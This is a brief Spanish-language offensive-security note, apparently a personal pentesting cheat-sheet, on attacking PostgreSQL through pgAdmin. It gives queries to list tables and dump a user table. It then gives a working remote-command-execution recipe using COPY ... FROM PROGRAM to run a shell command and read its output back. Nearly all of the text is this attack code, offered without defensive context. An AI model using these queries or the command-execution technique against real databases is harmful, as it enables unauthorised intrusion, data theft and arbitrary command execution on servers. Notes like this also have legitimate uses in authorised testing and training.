Skip to content

PgAdmin

#postgresql #pgadmin #rce #sqli

Para ejecutar comandos sobre una db

Pasted image 20260619120554
  • Listar las tablas de la db actual
sql
SELECT table_schema, table_name 
FROM information_schema.tables 
WHERE table_schema NOT IN ('pg_catalog', 'information_schema')
ORDER BY table_schema, table_name;
  • Listar contenido
sql
SELECT * FROM user LIMIT 50;
  • RCE con output por consola
sql
DROP TABLE IF EXISTS rce_out;
CREATE TABLE rce_out (resultado text);
COPY rce_out FROM PROGRAM 'id';
SELECT * FROM rce_out;

Notas personales de seguridad ofensiva.